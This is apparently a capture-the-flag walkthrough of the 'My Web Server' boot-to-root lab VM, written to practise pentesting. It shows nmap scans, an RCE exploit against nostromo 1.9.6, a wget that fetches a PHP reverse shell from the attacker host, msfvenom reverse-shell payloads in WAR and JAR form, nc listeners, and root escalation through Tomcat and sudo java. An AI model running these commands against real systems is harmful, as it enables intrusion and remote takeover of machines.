Welcome to “My Web Server”
This boot to root VM is designed for testing your pentesting skills and concepts. It consists of some well known things but it encourages you to use the functionalities rather than vulnerablities of target.
Goal: Get the root flag of the target.
Difficulty: Medium/Intermediate Level
Need hints? Twitter @akankshavermasv
DHCP is enabled
Your feedback is really valuable for me! Twitter @akankshavermasv
Was there something that you didn’t like about this VM?
Please let me know so that I can make more interesting challenges in the future.
This works better with VirtualBox rather than VMware.
# nmap -v 192.168.56.1/24
#nmap -v -sV -sC -O -A -p- -oN nmap.txt 192.168.56.148
After enumrating various services on machine i found nostromo 1.9.6 vunreable to RCE.
On further enumration i got an bash script.
./exploit.sh 192.168.56.148 2222 id
GET A SHELL
/tem dir is writeable and wget service is also accessible.
So i enabled my python server on 8080 port and transfered my php shell file to target machine.
# ./exploit.sh 192.168.56.148 2222 cd /tmp/; wget http://192.168.56.1:8080/shell.php
This succesfully transfers our reverse shell on traget machine. Now we just have to execute our php file and we get shell.
I just turn on my reverse shell listener.
getting a shell
#./exploit.sh 192.168.56.149 2222 “php /tmp/shell.php”
UPGRADING TO TTY SHELL
#python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
#stty raw -echo
After some enumration i got an sudoer file.
We can run java as root by tomcat user without password.
After going through passwd file, we cannot switch to tomcat user by password.
Finding the world readables, i got a tomcat writeable file.
Their is a tomcat service running on port 8080
logining with id and password
upload a reverse shell in .WAR file.
#msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.56.1 LPORT=4455-f war > shell.war
After uploading the shell file we can see it in application manager.
#nc -lvp 4455
upgrade to tty shell.
#msfvenom — platform java -f jar -p java/shell_reverse_tcp LHOST=192.168.56.1 LPORT=7777 -o payload.jar
starting python server and transfering payload.
Now, /opt/tomcat directory is writeable.
Now running this exploit as root and starting listener on port 7777.